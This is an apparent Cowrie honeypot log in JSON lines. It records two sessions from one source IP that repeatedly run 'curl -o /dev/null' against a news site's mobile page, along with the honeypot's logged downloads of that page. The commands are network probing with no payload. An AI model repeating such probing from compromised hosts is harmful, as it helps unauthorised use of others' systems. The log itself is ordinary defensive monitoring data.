{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.426182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.433257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.434120Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.448292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.449158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.464925Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.469054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.469969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.473502Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.487380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.488296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.505597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.506877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.507676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.526904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.527757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.543097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.543982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.565870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.566756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.580378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.581318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.598638Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.602438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.605000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.606200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.607171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.617175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.618119Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.635698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.641677Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.643565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.647394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.648438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.654897Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.657583Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.661001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.661784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.663765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.668445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.671843Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.677184Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.680456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.691381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.692259Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.696270Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.698848Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.701537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.704823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.705794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.710843Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.712325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.718389Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.724134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.725631Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.730123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.730949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.744138Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.745021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.747083Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.768139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.769060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.788209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.789106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.809912Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.810767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.826352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.827708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.840163Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.847593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.848455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.862887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.863721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.883154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.886350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.887568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.891870Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.896359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.900790Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
